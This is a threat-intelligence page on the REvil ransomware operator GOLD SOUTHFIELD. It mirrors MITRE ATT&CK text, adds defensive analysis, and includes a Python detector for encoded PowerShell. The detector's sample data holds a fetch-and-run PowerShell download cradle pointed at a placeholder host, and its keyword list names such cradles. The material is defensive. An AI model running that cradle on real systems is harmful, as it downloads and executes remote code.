MITRE ATT&CK® Group

G0115: GOLD SOUTHFIELD

GOLD SOUTHFIELD is a financially motivated threat group active since at least 2018 that operates the REvil Ransomware-as-a-Service (RaaS). GOLD SOUTHFIELD provides backend infrastructure for affiliates recruited on underground forums to perpetrate high-value deployments. By early 2020, GOLD SOUTHFIELD started capitalizing on the new trend of stealing data and further extorting the victim to pay so that their data is not publicly leaked.[1][2][3][4]

Domain: Enterprise | ID: G0115 | Type: Group | Object version: 2.0

Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

GOLD SOUTHFIELD matters because ATT&CK describes it as a financially motivated group operating the REvil ransomware-as-a-service model, with affiliates used for high-value deployments and data-theft extortion. For leaders, the decision point is not only “ransomware prevention,” but whether the organization can withstand affiliate-driven intrusion paths that may involve phishing, exposed services, trusted third parties, legitimate remote access tools, and eventual extortion pressure.

Executive priority

Prioritize this as an operational resilience and incident decision-making issue. The supplied relationships connect GOLD SOUTHFIELD to REvil, ConnectWise, external remote services, public-facing application exploitation, phishing, trusted relationships, and software supply chain compromise. Executives should ask whether critical business services, third-party access paths, remote administration tooling, backup recovery, legal/comms extortion procedures, and audit evidence for access control are tested together rather than managed as separate controls.

Technical view

ATT&CK does not provide a dedicated detection section for this group, so coverage should be validated through the related behaviors and software. SOC and IR teams should test visibility for Windows-focused ransomware activity associated with REvil, legitimate remote administration tool use such as ConnectWise, suspicious PowerShell and obfuscated command execution, screen capture behavior, phishing-driven access, exploitation of Internet-facing applications, external remote service abuse, trusted-relationship access, and software supply chain exposure. Because the group object has no specified platforms or tactics, detection engineering should anchor analytics to the relationship set rather than assume a single intrusion path.

Likely telemetry

  • Identity provider and VPN authentication logs for external remote services, unusual access patterns, and third-party logins
  • Endpoint process creation, command-line, PowerShell, script block, and obfuscation-related telemetry
  • Remote administration and support tool logs, including authorized ConnectWise usage where deployed
  • Email security, URL click, attachment, and user-reporting telemetry for phishing-related access
  • Public-facing application, web server, WAF, vulnerability, and exposure management data

Detection direction

  • Start with control-point coverage: identity, endpoint, remote access, exposed applications, email, and third-party access should all produce searchable evidence before writing group-specific detections.
  • Tune detections for suspicious PowerShell and command obfuscation while accounting for legitimate administration scripts to reduce false positives.
  • Baseline approved remote access tools and investigate use outside expected users, hosts, hours, or support workflows; legitimate tools can otherwise appear normal.
  • Correlate initial-access signals, such as phishing, public-facing application alerts, external remote service logins, and trusted-relationship access, with later endpoint execution or remote administration activity.
  • Use REvil as ransomware context, but avoid assuming every ransomware or remote access alert is GOLD SOUTHFIELD without supporting evidence.
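An added example (not from the page, Glexia, or MITRE) of the PowerShell-focused detection in the second bullet: it flags powershell.exe launched with an encoded command (the T1027.010 and T1059.001 relationships in the table below), decodes the UTF-16LE payload so an analyst can read it, and downgrades known automation accounts from "alert" to "review" to limit false positives. Event fields, host names, and the allowlisted account are constructed assumptions.

```python
import base64
import re

# Added example (not from the page); event fields, hosts and account names are constructed.
# powershell.exe accepts abbreviations of -EncodedCommand; match the common ones.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)[-/](?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)")
SUSPICIOUS_HINTS = ("-nop", "-noni", "-w hidden", "bypass", "iex", "downloadstring")  # often seen with encoded launches
APPROVED_AUTOMATION_USERS = {"CORP\\svc_patchmgmt"}  # constructed allowlist of expected automation


def decode_encoded_command(blob):
    """Decode a -EncodedCommand argument (base64 over UTF-16LE); None if malformed."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        return raw.decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Verdict for one process-creation event: 'alert', 'review' or 'none', plus evidence."""
    cmd = event.get("cmdline", "")
    reasons, decoded = [], None
    if "powershell" in cmd.lower():
        m = ENCODED_FLAG.search(cmd)
        if m:
            decoded = decode_encoded_command(m.group(1))
            reasons.append("encoded command")
        # Search the command line minus the base64 blob, plus the decoded script, so random base64 cannot match hints.
        haystack = (ENCODED_FLAG.sub(" ", cmd) + " " + (decoded or "")).lower()
        reasons += [h for h in SUSPICIOUS_HINTS if h in haystack]
    if not reasons:
        verdict = "none"
    elif event.get("user") in APPROVED_AUTOMATION_USERS:
        verdict = "review"  # expected automation: keep the evidence, do not page
    else:
        verdict = "alert"
    return {"verdict": verdict, "decoded": decoded, "reasons": reasons}


def _enc(script):  # sample-data helper: encode the way powershell.exe expects
    return base64.b64encode(script.encode("utf-16le")).decode()


SAMPLE_EVENTS = [  # constructed, not real telemetry
    {"host": "WS-042", "user": "CORP\\jdoe", "cmdline": "powershell.exe -nop -w hidden -enc "
     + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')")},
    {"host": "SRV-01", "user": "CORP\\svc_patchmgmt", "cmdline": "powershell.exe -EncodedCommand " + _enc("Get-Service wuauserv")},
    {"host": "WS-007", "user": "CORP\\asmith", "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},
]
```

Run `analyze` over each entry of `SAMPLE_EVENTS`: the first produces an alert with the decoded download cradle as evidence, the second is downgraded to review because the account is allowlisted, and the plain script execution produces no verdict.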

Mitigation priorities

  • Harden and monitor external remote services with strong authentication, least privilege, session logging, and rapid disablement procedures.
  • Reduce Internet-facing application risk through asset inventory, patch prioritization, configuration review, and exposure management.
  • Govern legitimate remote administration tools with approved inventories, restricted operators, logging, and alerting on unexpected installation or use.
  • Strengthen phishing resilience through email controls, user reporting, identity protections, and incident playbooks for suspected credential compromise.
  • Review trusted third-party and software supply chain access, especially elevated vendor connectivity into internal or cloud environments.

Analyst notes and limits

The most useful defensive interpretation is the RaaS affiliate model: organizations should expect multiple possible access paths and should validate layered readiness rather than search for one fixed playbook. The ConnectWise relationship is especially important for distinguishing authorized remote support from adversary use of legitimate administration tooling.

The supplied ATT&CK group object does not specify platforms, tactics, or an official detection section. Platform and behavior guidance here is derived from the supplied relationships to REvil, ConnectWise, and related ATT&CK techniques. Local asset inventory, tool usage, identity architecture, vendor access, and incident history are required to assess actual exposure or coverage.

Official MITRE ATT&CK definition

GOLD SOUTHFIELD

GOLD SOUTHFIELD is a financially motivated threat group active since at least 2018 that operates the REvil Ransomware-as-a-Service (RaaS). GOLD SOUTHFIELD provides backend infrastructure for affiliates recruited on underground forums to perpetrate high-value deployments. By early 2020, GOLD SOUTHFIELD started capitalizing on the new trend of stealing data and further extorting the victim to pay so that their data is not publicly leaked.[1][2][3][4]

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library).

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

ATT&CK relationship table

Techniques used

This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.

Domain ID Name Relationship / procedure
Enterprise T1199 Trusted Relationship

GOLD SOUTHFIELD has breached Managed Service Providers (MSPs) to deliver malware to MSP customers. (Citation: Secureworks REvil September 2019)

Enterprise T1190 Exploit Public-Facing Application

GOLD SOUTHFIELD has exploited Oracle WebLogic vulnerabilities for initial compromise. (Citation: Secureworks REvil September 2019)

Enterprise T1113 Screen Capture

GOLD SOUTHFIELD has used the remote monitoring and management tool ConnectWise to obtain screen captures from victims' machines. (Citation: Tetra Defense Sodinokibi March 2020)

Enterprise T1219 Remote Access Tools

GOLD SOUTHFIELD has used the cloud-based remote management and monitoring tool "ConnectWise Control" to deploy REvil. (Citation: Tetra Defense Sodinokibi March 2020)

Enterprise T1195.002 Compromise Software Supply Chain Sub-technique

GOLD SOUTHFIELD has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR. (Citation: Secureworks REvil September 2019) (Citation: Secureworks GandCrab and REvil September 2019) (Citation: Secureworks GOLD SOUTHFIELD)

Enterprise T1027.010 Command Obfuscation Sub-technique

GOLD SOUTHFIELD has executed base64-encoded PowerShell scripts on compromised hosts. (Citation: Tetra Defense Sodinokibi March 2020)

Enterprise T1133 External Remote Services

GOLD SOUTHFIELD has used publicly accessible RDP and remote management and monitoring (RMM) servers to gain access to victim machines. (Citation: Secureworks REvil September 2019)

Enterprise T1059.001 PowerShell Sub-technique

GOLD SOUTHFIELD has staged and executed PowerShell scripts on compromised hosts. (Citation: Tetra Defense Sodinokibi March 2020)

Enterprise T1566 Phishing

GOLD SOUTHFIELD has conducted malicious spam (malspam) campaigns to gain access to victims' machines. (Citation: Secureworks REvil September 2019)

Associated objects

Groups, software, and campaigns

Malware (Enterprise)

S0496: REvil

REvil is a ransomware family that has been linked to the GOLD SOUTHFIELD group and operated as ransomware-as-a-service (RaaS) since at least April 2019. REvil, which has been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.[1][2][3]

Platforms: Windows
Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources (Updates).

ATT&CK release: 19.1
Object version: 2.0
Created:
Modified:
Raw hash: 72f889d06ace287b...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status | Raw hash
19.1 | | 2.0 | | Current bundle | 72f889d06ace…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1] Secureworks REvil September 2019. Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.
  2. [2] Secureworks GandCrab and REvil September 2019. Secureworks. (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.
  3. [3] Secureworks GOLD SOUTHFIELD. Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.
  4. [4] CrowdStrike Evolution of Pinchy Spider July 2021. Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.
  5. [5] Pinchy Spider. (Citation: CrowdStrike Evolution of Pinchy Spider July 2021)
  6. [6] mitre-attack G0115. MITRE ATT&CK source record.

Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.